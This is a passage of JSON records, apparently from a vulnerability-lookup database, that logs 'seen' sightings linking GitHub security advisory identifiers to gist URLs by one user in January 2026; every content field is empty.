"2026-01-24T22:19:58.000000Z"}, {"uuid": "8773b2ee-9a72-4eef-ba55-cda3be1cb39a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6pmj-xjxp-p8g9", "type": "seen", "source": "https://gist.github.com/alon710/ee6559d38739c068820837243e6a26a2", "content": "", "creation_timestamp": "2026-01-24T22:19:56.000000Z"}, {"uuid": "b836a886-23ab-4f32-8e73-1d7c453c8047", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pchf-49fh-w34r", "type": "seen", "source": "https://gist.github.com/alon710/2ea6b19b10bfb8d66c4d1874c3995539", "content": "", "creation_timestamp": "2026-01-24T22:19:47.000000Z"}, {"uuid": "53b23bf5-f5ac-4aeb-8032-8586b531216b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xxjr-mmjv-4gpg", "type": "seen", "source": "https://gist.github.com/alon710/17f88fb1f8824521ab9e2ce51a61810b", "content": "", "creation_timestamp": "2026-01-24T22:19:41.000000Z"}, {"uuid": "b026a170-a8e1-442f-8b85-1cd76423b4b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R92C-9C7F-3PJ8", "type": "seen", "source": "https://gist.github.com/alon710/556736dab46a1491f80f21ca9386f8bb", "content": "", "creation_timestamp": "2026-01-24T22:19:35.000000Z"}, {"uuid": "abd9210e-394d-47b3-b6a5-b86a69574887", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R92C-9C7F-3PJ8", "type": "seen", "source": "https://gist.github.com/alon710/ec9285a44b682d3f69df21ae6f5d9caf", "content": "", "creation_timestamp": "2026-01-24T22:19:32.000000Z"}, {"uuid": "a6bfb76f-911c-4b05-95eb-c3c0d56b35e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q2x5-4xjx-c6p9", "type": "seen", "source": "https://gist.github.com/alon710/326dcbce53f4cef418c9b89414961d44", "content": "", "creation_timestamp": "2026-01-24T22:19:29.000000Z"}, {"uuid": "0e7565cf-6bbe-4367-8149-120a1481da3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q2x5-4xjx-c6p9", "type": "seen", "source": "https://gist.github.com/alon710/932f11b496a11161d969e7d0145a5e44", "content": "", "creation_timestamp": "2026-01-24T22:19:27.000000Z"}, {"uuid": "252ae6cc-2ec2-4cba-9ff0-bb53885f1b17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2p49-45hj-7mc9", "type": "seen", "source": "https://gist.github.com/alon710/d7b3e22b7bae4f925e70e83a8b0e4438", "content": "", "creation_timestamp": "2026-01-24T22:19:24.000000Z"}, {"uuid": "bc5d2555-d25d-4453-99e9-5d65443bc8fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2p49-45hj-7mc9", "type": "seen", "source": "https://gist.github.com/alon710/a4941f2432a88ce8da6f5f32e199afb8", "content": "", "creation_timestamp": "2026-01-24T22:19:21.000000Z"}, {"uuid": "5c431977-891b-4070-b801-88caa0a730f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rq6q-wr2q-7pgp", "type": "seen", "source": "https://gist.github.com/alon710/696016c894d5712b6cf6f7949f65ebef", "content": "", "creation_timestamp": "2026-01-24T22:19:16.000000Z"}, {"uuid": "a2d0e1b2-58b7-46cf-8273-cb69a5cc7d13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rq6q-wr2q-7pgp", "type": "seen", "source": "https://gist.github.com/alon710/051896da1df2ef30fd27ece334001d8c", "content": "", "creation_timestamp": "2026-01-24T22:19:14.000000Z"}, {"uuid": "c30422d4-436e-4931-bc3a-24dc5dbcb76c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4xh5-jcj2-ch8q", "type": "seen", "source": "https://gist.github.com/alon710/a707a889ef6e9f6c373ed1e63d865e82", "content": "", "creation_timestamp": "2026-01-24T22:19:11.000000Z"}, {"uuid": "2e2ee6f9-6481-4f91-aec8-db509ad5e170", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4xh5-jcj2-ch8q", "type": "seen", "source": "https://gist.github.com/alon710/b7bde8da7ddb5ddf55e3c6550ccdb464", "content": "", "creation_timestamp": "2026-01-24T22:19:08.000000Z"}, {"uuid": "f1bf7091-4016-4bc3-8789-c219d7413301", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4fqp-r85r-hxqh", "type": "seen", "source": "https://gist.github.com/alon710/cd04efb926f8f323d399c4afc30212ce", "content": "", "creation_timestamp": "2026-01-24T22:19:05.000000Z"}, {"uuid": "bf0fc49d-115f-4bd4-aa06-5851c4d929f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4fqp-r85r-hxqh", "type": "seen", "source": "https://gist.github.com/alon710/96cd1638e3c44a7f13fce147d60ee2ab", "content": "", "creation_timestamp": "2026-01-24T22:19:02.000000Z"}, {"uuid": "07233343-8121-4bc9-8330-3a05a4d3c5c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pj88-9xww-gxmh", "type": "seen", "source": "https://gist.github.com/alon710/dae5eabe48079d615475755a8df2d7b5", "content": "", "creation_timestamp": "2026-01-24T22:22:38.000000Z"}, {"uuid": "992e9039-037f-45ed-9886-ccbbf9f74936", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pj88-9xww-gxmh", "type": "seen", "source": "https://gist.github.com/alon710/e4fac37b6b446daac84efcc33834c24f", "content": "", "creation_timestamp": "2026-01-24T22:22:35.000000Z"}, {"uuid": "26c551d3-85b5-4d5e-83a9-465c458ad822", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-43mm-m3h2-3prc", "type": "seen", "source": "https://gist.github.com/alon710/93b2641c6b49c51e82c31c6a825e89f4", "content": "", "creation_timestamp": "2026-01-24T22:22:32.000000Z"}, {"uuid": "a0fa0dd3-76ca-451d-b3b6-77cad90b016a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-43mm-m3h2-3prc", "type": "seen", "source": "https://gist.github.com/alon710/e0638b57010febbe150ebce61e6e7db7", "content": "", "creation_timestamp": "2026-01-24T22:22:29.000000Z"}, {"uuid": "b2cb0dc8-108f-46ca-aecb-fc11ed2da5fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-43mm-m3h2-3prc", "type": "seen", "source": "https://gist.github.com/alon710/b74440e8bec22240638c7e3fbaf666c4", "content": "", "creation_timestamp": "2026-01-24T22:22:27.000000Z"}, {"uuid": "b784fc87-4c30-4df7-aecf-701bafd74144", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-43mm-m3h2-3prc", "type": "seen", "source": "https://gist.github.com/alon710/ea4a17beafbdf86aa1a3f329054b3b8e", "content": "", "creation_timestamp": "2026-01-24T22:22:24.000000Z"}, {"uuid": "d5426fc8-c31c-4958-be0e-ab0a97291209", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cv54-7wv7-qxcw", "type": "seen", "source": "https://gist.github.com/alon710/b513c0e383930a9ac00d6482034a4d86", "content": "", "creation_timestamp": "2026-01-24T22:22:21.000000Z"}, {"uuid": "8b09166d-4c8a-45db-9202-116797472ed3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cv54-7wv7-qxcw", "type": "seen", "source": "https://gist.github.com/alon710/9ebd606572cd657068943f307a3e8719", "content": "", "creation_timestamp": "2026-01-24T22:22:19.000000Z"}, {"uuid": "54083e18-bc8d-4115-9dd1-f734efc7f50c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cv54-7wv7-qxcw", "type": "seen", "source": "https://gist.github.com/alon710/26288c0c964dd2a128cf9db950212916", "content": "", "creation_timestamp": "2026-01-24T22:22:16.000000Z"}, {"uuid": "9ab63700-f1c6-4d56-b75e-d1c329f5448c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cv54-7wv7-qxcw", "type": "seen", "source": "https://gist.github.com/alon710/b99cfeea78c9e37689f5786ed7dbe1de", "content": "", "creation_timestamp": "2026-01-24T22:22:13.000000Z"}, {"uuid": "1e46ad8e-5d23-42fc-bfec-5977cdd3321f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-94c7-g2fj-7682", "type": "seen", "source": "https://gist.github.com/alon710/587fc5012eb2f83afbad574208714e09", "content": "", "creation_timestamp": "2026-01-24T22:22:10.000000Z"}, {"uuid": "f73c5c74-4883-4260-9880-2f0729112632", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-94c7-g2fj-7682", "type": "seen", "source": "https://gist.github.com/alon710/5ddb3a448ab00c449ab860eacd5ce256", "content": "", "creation_timestamp": "2026-01-24T22:22:08.000000Z"}, {"uuid": "ecd51887-24e7-49ae-a8c7-efcadea79424", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-94c7-g2fj-7682", "type": "seen", "source": "https://gist.github.com/alon710/0173d18c59a7f65aae52930ff3fc5714", "content": "", "creation_timestamp": "2026-01-24T22:22:05.000000Z"}, {"uuid": "a661de6d-a9ac-4afe-925c-6f751f406ecb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-94c7-g2fj-7682", "type": "seen", "source": "https://gist.github.com/alon710/080924ff48eead208c4186ef82e51189", "content": "", "creation_timestamp": "2026-01-24T22:22:02.000000Z"}, {"uuid": "0ddac81e-45a6-48b1-95e5-efb6807b1563", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-339m-4qw5-j2g3", "type": "seen", "source": "https://gist.github.com/alon710/6eb77d26fef128a6ba0173db798fe9dc", "content": "", "creation_timestamp": "2026-01-24T22:21:16.000000Z"}, {"uuid": "b54b4b48-65b9-4d7b-bf8f-bb265d274779", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-339m-4qw5-j2g3", "type": "seen", "source": "https://gist.github.com/alon710/66be4153f8769099770252959c1f91a7", "content": "", "creation_timestamp": "2026-01-24T22:21:11.000000Z"}, {"uuid": "a328f77d-1277-40a5-8519-790dedd01814", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-339m-4qw5-j2g3", "type": "seen", "source": "https://gist.github.com/alon710/7a4a83d05190b0593b439aa5123484ea", "content": "", "creation_timestamp": "2026-01-24T22:21:08.000000Z"}, {"uuid": "e096e763-4560-45bf-9833-d839c017f640", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H3HW-29FV-2X75", "type": "seen", "source": "https://gist.github.com/alon710/dddbe0dd63ca018c45d649fcdb4763c0", "content": "", "creation_timestamp": "2026-01-24T22:21:06.000000Z"}, {"uuid": "f2e9ccf8-afe1-4d10-aeea-f6ca4263c7ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H3HW-29FV-2X75", "type": "seen", "source": "https://gist.github.com/alon710/36ac689a143e58c48a9bef9589b25cc7", "content": "", "creation_timestamp": "2026-01-24T22:21:03.000000Z"}, {"uuid": "5f0be334-810c-4010-b32a-f9d5fec80b95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H3HW-29FV-2X75", "type": "seen", "source": "https://gist.github.com/alon710/42ec3cc5e1875ec7b10d1f11294e89aa", "content": "", "creation_timestamp": "2026-01-24T22:21:00.000000Z"}, {"uuid": "4217e98b-2a0a-467b-9fc4-a559329e2552", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H3HW-29FV-2X75", "type": "seen", "source": "https://gist.github.com/alon710/2bfc9755e2a916fba8385393e75c56a2", "content": "", "creation_timestamp": "2026-01-24T22:20:57.000000Z"}, {"uuid": "d656ea22-35cf-42bb-aa56-31d6cc7f02a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qp59-x883-77qv", "type": "seen", "source": "https://gist.github.com/alon710/85d6b0dd0b10ec0d7726957ad9270c58", "content": "", "creation_timestamp": "2026-01-24T22:24:19.000000Z"}, {"uuid": "40d5a28a-751d-4dd8-9d20-33e30c8e4498", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qp59-x883-77qv", "type": "seen", "source": "https://gist.github.com/alon710/aac10b6706abd8b094730c9a318983aa", "content": "", "creation_timestamp": "2026-01-24T22:24:17.000000Z"}, {"uuid": "792e57c5-e337-48f7-ac06-cac8dc174a58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qp59-x883-77qv", "type": "seen", "source": "https://gist.github.com/alon710/2ba7e795fb5a2b9ae6e4338b36a69f66", "content": "", "creation_timestamp": "2026-01-24T22:24:14.000000Z"}, {"uuid": "fa7a7b0b-c8b1-406d-b760-2ed4c6170ea2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qp59-x883-77qv", "type": "seen", "source": "https://gist.github.com/alon710/51b6c95f5e201ab5669038ec79df4be0", "content": "", "creation_timestamp": "2026-01-24T22:24:11.000000Z"}, {"uuid": "907bbcfa-cbc1-49f4-b08c-513e1b64055f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v98v-ff95-f3cp", "type": "seen", "source": "https://gist.github.com/alon710/47a6ef5320622482cd20a6349fccebb8", "content": "", "creation_timestamp": "2026-01-24T22:23:53.000000Z"}, {"uuid": "326a79f1-ab26-4acf-b8d9-a0d0792e539b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v98v-ff95-f3cp", "type": "seen", "source": "https://gist.github.com/alon710/e2498022409eb3d0a5977165f31e1a14", "content": "", "creation_timestamp": "2026-01-24T22:23:58.000000Z"}, {"uuid": "6e65b73e-43b2-450a-97af-65497e0856e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v98v-ff95-f3cp", "type": "seen", "source": "https://gist.github.com/alon710/8a13838dcb42a208b7b1a088830d1b2e", "content": "", "creation_timestamp": "2026-01-24T22:23:55.000000Z"}, {"uuid": "e4229637-f899-4cb0-a175-9d711943737a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5QW5-WF2Q-F538", "type": "seen", "source": "https://gist.github.com/alon710/d0c1178fbf8fa30b7662bbfd575162bb", "content": "", "creation_timestamp": "2026-01-24T22:28:06.000000Z"}, {"uuid": "682d009b-da24-40b8-8271-f4264ab64d7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-63vm-454h-vhhq", "type": "seen", "source": "https://gist.github.com/alon710/95daa38d60233677196c88a2a141cdca", "content": "", "creation_timestamp": "2026-01-24T22:28:02.000000Z"}, {"uuid": "aa155029-a21b-4270-b2e8-ce12a39dd695", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-63vm-454h-vhhq", "type": "seen", "source": "https://gist.github.com/alon710/0b5f4513dae90e89ae001d76d28a07ab", "content": "", "creation_timestamp": "2026-01-24T22:28:00.000000Z"}, {"uuid": "f172349e-5424-4b8b-921b-6abd64f32355", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-333v-68xh-8mmq", "type": "seen", "source": "https://gist.github.com/alon710/ea83ffac88598e2c75da99db8969732b", "content": "", "creation_timestamp": "2026-01-24T22:27:57.000000Z"}, {"uuid": "925edc4d-ce7f-4898-8873-c75728b1e3c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-333v-68xh-8mmq", "type": "seen", "source": "https://gist.github.com/alon710/7cecc1e0eaba20d851cbf479e8c49bdd", "content": "", "creation_timestamp": "2026-01-24T22:27:54.000000Z"}, {"uuid": "ed2978d0-a27a-4e86-9e9d-43aad1b42eae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fccg-7w3p-w66f", "type": "seen", "source": "https://gist.github.com/alon710/70d68169dc2f872cc658a2e78878e162", "content": "", "creation_timestamp": "2026-01-24T22:27:51.000000Z"}, {"uuid": "444f1211-87ba-4a4a-832e-853d65c2a963", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fccg-7w3p-w66f", "type": "seen", "source": "https://gist.github.com/alon710/fc589532cab3546e6834311261d10e45", "content": "", "creation_timestamp": "2026-01-24T22:27:48.000000Z"}, {"uuid": "da428b2c-40d8-4a76-b97a-5fd812fbe1cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7c2f-r6gc-h92h", "type": "seen", "source": "https://gist.github.com/alon710/6a6acfd0e6d76b13356a9e2243060b29", "content": "", "creation_timestamp": "2026-01-24T22:27:45.000000Z"}, {"uuid": "c4272d46-8f73-452a-8ee7-9c717be0edee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7c2f-r6gc-h92h", "type": "seen", "source": "https://gist.github.com/alon710/53995fe8099ea4123a16bf135e515d18", "content": "", "creation_timestamp": "2026-01-24T22:27:43.000000Z"}, {"uuid": "b22a6272-f6ea-47b9-aff9-b4068a1b0fce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jv7x-xhv2-p5v2", "type": "seen", "source": "https://gist.github.com/alon710/039391749baf0eb268e67bdef59370a8", "content": "", "creation_timestamp": "2026-01-24T22:27:28.000000Z"}, {"uuid": "7dce1555-1917-462e-8fbf-206e975e887e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jv7x-xhv2-p5v2", "type": "seen", "source": "https://gist.github.com/alon710/a0fb119ca0f8aaba85cb2cac880d6f0d", "content": "", "creation_timestamp": "2026-01-24T22:27:25.000000Z"}, {"uuid": "a4797f9c-3ebc-420d-bc2f-6f5aa34597d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-54wq-72mp-cq7c", "type": "seen", "source": "https://gist.github.com/alon710/84e5b3aef066f565c558c1836819dfc2", "content": "", "creation_timestamp": "2026-01-24T22:27:05.000000Z"}, {"uuid": "1a63067a-0dd1-4821-80e0-37359d9e9f78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-54wq-72mp-cq7c", "type": "seen", "source": "https://gist.github.com/alon710/3bb76c30c99548ed24f519c1ff7ff0cd", "content": "", "creation_timestamp": "2026-01-24T22:27:02.000000Z"}, {"uuid": "cdf36567-377b-444b-a8ca-33736ee698fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qppm-g56g-fpvp", "type": "seen", "source": "https://gist.github.com/alon710/00e63d22022281d8c572a00983a5f6b0", "content": "", "creation_timestamp": "2026-01-24T22:26:59.000000Z"}, {"uuid": "9dbc76a3-1509-43da-a885-c6c6b777eac4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qppm-g56g-fpvp", "type": "seen", "source": "https://gist.github.com/alon710/669a424ad33de80926f7011f1c29cb7a", "content": "", "creation_timestamp": "2026-01-24T22:26:56.000000Z"}, {"uuid": "1adf400f-7f00-4112-a282-3c64a07890e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v4w8-49pv-mf72", "type": "seen", "source": "https://gist.github.com/alon710/2200b60daffcbece666228cfabe9eca0", "content": "", "creation_timestamp": "2026-01-24T22:26:53.000000Z"}, {"uuid": "01cac604-e2c9-4204-aad7-1f9af6152f4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v4w8-49pv-mf72", "type": "seen", "source": "https://gist.github.com/alon710/0eb021b8a52796652d86de9e052de330", "content": "", "creation_timestamp": "2026-01-24T22:26:50.000000Z"}, {"uuid": "07ede91a-a1b6-4428-bd45-47924646431f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4r5r-ccr6-q6f6", "type": "seen", "source": "https://gist.github.com/alon710/c956893512d68af8f038dc867468b800", "content": "", "creation_timestamp": "2026-01-24T22:26:41.000000Z"}, {"uuid": "1b6edeef-4ea5-4207-abc3-27c67e325640", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4r5r-ccr6-q6f6", "type": "seen", "source": "https://gist.github.com/alon710/419bc7fc71b45870f291dacc1365e2f1", "content": "", "creation_timestamp": "2026-01-24T22:26:39.000000Z"}, {"uuid": "1d58c04b-a40f-4101-a3e5-cf602762c2a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gfpw-jgvr-cw4j", "type": "seen", "source": "https://gist.github.com/alon710/1a22eed3048b1282bb535d59be57eb71", "content": "", "creation_timestamp": "2026-01-24T22:26:36.000000Z"}, {"uuid": "f9ef421a-b9cf-410b-ace2-b6e20de7b1d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gfpw-jgvr-cw4j", "type": "seen", "source": "https://gist.github.com/alon710/f30dfca4833be946bfbfe3ad5d0ceea4", "content": "", "creation_timestamp": "2026-01-24T22:26:33.000000Z"}, {"uuid": "16d3c6fc-1371-41dc-953b-982b35aefde4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c336-7962-wfj2", "type": "seen", "source": "https://gist.github.com/alon710/b590d0dbc4af0467eca7b3945257c2dd", "content": "", "creation_timestamp": "2026-01-24T22:29:29.000000Z"}, {"uuid": "56b041cb-4a2b-42a8-86bb-52bd821bd3a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c336-7962-wfj2", "type": "seen", "source": "https://gist.github.com/alon710/fa293cc054424ea22fbbba686efed6ed", "content": "", "creation_timestamp": "2026-01-24T22:29:27.000000Z"}, {"uuid": "53861063-fdd7-427f-9e01-d027ad4810ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5379-f5hf-w38v", "type": "seen", "source": "https://gist.github.com/alon710/cad9a913b77270d769ddeb539f3dba64", "content": "", "creation_timestamp": "2026-01-24T22:29:24.000000Z"}, {"uuid": "9f05046f-1de7-4c92-8a92-7875e016c314", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g7f-ff96-5gcw", "type": "seen", "source": "https://gist.github.com/alon710/689d4b4a36f24f9c99e58fa042536caa", "content": "", "creation_timestamp": "2026-01-24T22:28:52.000000Z"}, {"uuid": "6ba4a3a0-e8a3-45f7-a787-9024e3af5573", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H66J-XM43-47PP", "type": "seen", "source": "https://gist.github.com/alon710/7b3759537e96e8912519ed5c7d89647f", "content": "", "creation_timestamp": "2026-01-24T22:29:50.000000Z"}, {"uuid": "11ebe20b-39b3-45aa-935a-c9247f4fb44c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cwjm-3f7h-9hwq", "type": "seen", "source": "https://gist.github.com/alon710/1d62111a57deb802c0b01c88509fdc33", "content": "", "creation_timestamp": "2026-01-24T22:32:05.000000Z"}, {"uuid": "8170a7f6-574e-40c1-b572-e6d2f87d19ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cwjm-3f7h-9hwq", "type": "seen", "source": "https://gist.github.com/alon710/03c363be43242b3f7c4f2331506f5d5f", "content": "", "creation_timestamp": 